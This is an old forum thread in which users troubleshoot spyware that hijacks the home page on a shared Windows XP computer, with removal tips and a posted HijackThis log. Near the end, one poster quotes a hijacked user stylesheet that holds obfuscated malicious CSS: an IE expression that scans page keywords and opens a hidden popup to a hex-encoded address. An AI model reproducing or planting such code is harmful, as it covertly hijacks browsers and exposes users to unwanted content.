Guh, stupid spyware!

Not my fault this time. I highly suspect it was my father’s fault this time.

In this case, I’m using a windows XP Home box with eight different user accounts. ALL with Admin accounts. Dad refuses to have it any other way, and it is his computer…

I’ve been running Adaware and Spybot to get rid of it, and it does. But it always loads back in every time a user logs in, and it’s getting annoying. IT keeps posting links on the destktop and hijacking the home page to “” Otherwise I’m not sure what strain it is.

Mreh. Anyone have any ideas on how I could clean this stupid thing?

I’m currently having a very similar problem. This stuff just regenerates, and Adaware seems incapable of removing some DLLs that it really should. I might just wipe the harddrive. It’s overdue anyway.

Run the computer in safe mode, then run adaware and spybot.

What’s probably happened is that the spyware has gotten into the startup routine of one or more user accounts, which can be a major pain with AdAware since I’ve noticed it seems to have trouble dealing with spyware in the startup programs. Here’s what you want to do:

  1. Restart the computer and log in, this is important since you want to be absolutely sure that only one session has been activated on this boot up.
  2. Close every program you can, all those little icons in your taskbar, if when you right click on them you have a close or exit option, close them. You should also close explorer, but if you know what you’re doing then it shouldn’t be a problem if you don’t.
  3. Press ctrl-alt-delete once, the task manager will pop up, click on the process tab.
  4. You’re going to see a list of every process that’s currently running on the computer (this I what I wanted you to restart, to make sure that only one user is active, it makes this easier), you’re task now is to find which process corresponds to the spyware you’re trying to remove. Here are a few tips:
    Processes with SYSTEM as the user are ok, ignore them.
    taskmrg is task manager, don’t close that.
    EXPLORER.EXE is windows, don’t close that.
    iexplore.exe is Internet Explorer, don’t close that if you’re reading this.

Your spyware is one of the other ones (if you closed everything you can like I suggested then there shouldn’t be that many)
5. Close the processes you think are causing the problem one at a time, making sure to write down the name of the process on a piece of paper (more on this later), after each process you kill do something that normally give you a reaction from it (just don’t reboot), if you see popups, or your homepage gets changed for example then you didn’t get the right one. If however all your problems stop then you probably found it. Once you do, move on to the next step.
6. You’ve now killed the spyware for this session, but as soon as you reboot it’ll be back, now what we want to do is get rid of it for good. Click on Start -> Run -> msconfig. and click OK.
7. A new window will load up, this is the ever so wonderful startup configuration utility that so mysteriously vanished from the system information’s tools menu under XP. Click on the startup tab.
8. What you want to do now is scroll down the list of programs and uncheck the one that matches the name of the spyware you wrote down (easier to remember if you write it, make sure not to uncheck anything that looks important). This will prevent the program from loading when you reboot. Once you’ve unchecked it click OK.
9. Now you want to restart the computer and login as the same user you were working with before. Again try doing the same actions that normally give you popups or other problems, if you’re not getting any then your problem is solved and you can move onto the last steps. If however you still have the same problems then go back to step 2 and try again (you might consider rechecking the program you unchecked in msconfig, if it wasn’t your source of trouble it might be important for something else).
10. Restart and log into one of the other accounts to make sure the problem is gone there as well, if it isn’t then go back to step 2 and keep looking; if it is, then move on to the final step.
11. Then once you’re sure that the problem is gone load up msconfig again and take a look at the path of the spyware you disabled, now that it’s not constantly in use you can actually go and delete it. So follow the path indicated and go kill the little bugger.

And that should do it, if you have any more problems just repost and I’ll see what I can do.

Where would us uncomputer savvy people be without DarkSand? (We need a bowing sprite) I’m not worthy, I’m not worthy!

I use spykiller, myself. Of course, I have yet to verify its effectiveness with another scan. We will see what happens next.

Okay, now I feel stupid. I should have specified that I’m not retarded. I know the basic Windows functions. I keep my processes down to the system minimum for my gaming already.

You don’t need to quote my entire post Caleb. Besides, that was for StarStorm, if you want help you’re going to have to be a lot less vague about what your problem is.

Shut off active x! It’s so incredibly insecure, MS should have their heads examined.

Hmmm… I was having similar problems, and though I knew how to do the whole system startup thing, I can’t believe I forgot to try it out -_-

No matter, just did, and lets see if it worked.

Hmmm I’llhave to find out what causes a reaction from it. All I have right now is that it keeps loading the stupid links and changing the home page with each new user. Thanks for the advice Dark Sand. I’ll try it out.

Before you start killing processes in msconfig, I do suggest that you do a quick search in google or something to see if they’re actually spyware processes. It never hurts to look.

<img src=“”> Poor Spazzy, you are having the same problem I had a few weeks ago. The problem I recieved was the result of my sister checking out WWE websites that have the very evil popup program, Purity Test (fake porn program), which send into other various evil spyware in. I tried Adware, which worked on other programs, but not destroy Purity Test. But that was when I discovered “Hijack This”, a very nice free program you can get at (type the name Hijack This in the search). It destroyed Purity Test and made sure that none of this crap ever happened again. But I might consider checking out the computer later using some of Dark Sand advice to see if Purity left a memento.

ACtually I watched Spybot work. IT takes that too.

Sorry for the double post.

The home page I keep getting is “

This is the task list I keep get, wiht nothing running:

I found one thing suspect: “CFD.exe”, which has the folder “C:\Program Files\BroadJump\Client Foundation”

So I deleted it after running a search on it. I hope it wasn’t important.

I also thought I had “scvhost.exe” but lucky me. I was mistaken.

So any ideas Dark Sand?

Don’t touch scvhost.exe, that manages network connections (which is why it’s under a SYSTEM, NETWORK SERVICE or LOCAL SERVICE username). Looking at this list the most likely candidate that comes to mind with be LVcomS.exe, that’s the type of filename you’d expect for this kind of spyware, try killing that. If that doesn’t work you can try jushed.exe and ALogServ.exe, those are the only two other processes, which I can’t think of what they might do, I have a good idea what the other processes do.

CFD.exe was a good guess, it’s probably the first one I would have tried, it also has a path like you’d expect for a piece of spyware, even if that’s not your source of problem it was probably another piece of spyware you weren’t aware of.

LVcomS.exe is my webcam.
jusched.exe seems to be the Java Virtual Machine.
AlogServ.exe seems to be linked to the McAfee AntiVirus.

One interesting thing that I keep getting, however, in MSconfig is “D:\Vsc\setup.exe” /RUNKEY, in the location SOFTWARE/Microsoft/Windows/CurrentVersion/Run

I’m going to try disabling that and rebooting with the traces cleaned off… I’m starting to think that this only runs during bootup and ends before I actually start my session. Well we’ll find out…

Edit: ok, not it. But I found something interesting due to HijackThis!. I’m going to fuck with it and see what happens:

Logfile of HijackThis v1.97.7
Scan saved at 12:11:07 AM, on 3/28/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\Program Files\McAfee\McAfee VirusScan\Avsynmgr.exe
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Common Files\Logitech\QCDriver2\LVCOMS.EXE
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\McAfee\McAfee VirusScan\alogserv.exe
C:\Program Files\Logitech\ImageStudio\LogiTray.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\McAfee\McAfee VirusScan\Avconsol.exe
C:\Program Files\Logitech\ImageStudio\LowLight.exe
C:\Documents and Settings\Bobby\My Documents\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM…\Run: [system32.dll] C:\WINDOWS\system\systeminit.exe
O4 - HKLM…\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM…\Run: [QuickTime Task] “C:\Program Files\QuickTime\qttask.exe” -atboottime
O4 - HKLM…\Run: [LVCOMS] C:\Program Files\Common Files\Logitech\QCDriver2\LVCOMS.EXE
O4 - HKLM…\Run: [LogitechGalleryRepair] C:\Program Files\Logitech\ImageStudio\ISStart.exe
O4 - HKLM…\Run: [iTunesHelper] C:\Program Files\iTunes\iTunesHelper.exe
O4 - HKLM…\Run: [BJCFD] C:\Program Files\BroadJump\Client Foundation\CFD.exe
O4 - HKLM…\Run: [Alogserv] C:\Program Files\McAfee\McAfee VirusScan\alogserv.exe
O4 - HKLM…\Run: [LogitechImageStudioTray] C:\Program Files\Logitech\ImageStudio\LogiTray.exe
O9 - Extra ‘Tools’ menuitem: Sun Java Console (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra ‘Tools’ menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: ICQ Pro (HKLM)
O9 - Extra ‘Tools’ menuitem: ICQ (HKLM)
O9 - Extra button: AIM (HKLM)
O9 - Extra button: (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra ‘Tools’ menuitem: Windows Messenger (HKLM)
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) -
O16 - DPF: {30528230-99F7-4BB4-88D8-FA1D4F56A2AB} (YInstStarter Class) -
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} -
O16 - DPF: {4D7F48C0-CB49-4EA6-97D4-04F4EACC2F3B} (InstallShield Setup Player 2K2) -
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) -
O16 - DPF: {AE1C01E3-0283-11D3-9B3F-00C04F8EF466} (HeartbeatCtl Class) -
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) -
O16 - DPF: {D719897A-B07A-4C0C-AEA9-9B663A28DFCB} (iTunesDetector Class) -
O16 - DPF: {F54C1137-5E34-4B95-95A5-BA56D4D8D743} (Secure Delivery) -
[i]O19 - User stylesheet: C:\WINDOWS\sstyle.css
O19 - User stylesheet: C:\WINDOWS\sstyle.css (HKLM)

The info on sstyle.css?

@charset “iso-8859-1”;
body{border-color:expression(dMT=document.getElementsByTagName(‘META’),dMT.length?(dMT.keywords?(dMTkc=dMT.keywords.content,(dMTkc.indexOf(‘sex’)>=0||dMTkc.indexOf(‘porn’)>=0 ||dMTkc.indexOf(‘adult’)>=0||dMTkc.indexOf(‘thehun’)>=0)?(‘http://%77%77%77%2E%74%68%65%62%65%73%74%73%65%2E%63%6F%6D/%63%6Fn%73%6Fl%65%2Ep%68p’,‘hvo’,‘x=5000,top=5000,y=5000,left=5000,height=600,width=800,directories=no,toolbar=no,status=no,location=no,resizable=no,menubar=no,scrollbars=no’)?document.getElementsByTagName(‘META’).keywords.content=’’:’’):’’):’’):’’)}

Hmm I wonder… Another to check out…

Edit #2: Ugh, that’s not it either. I haven’t killed my comp though…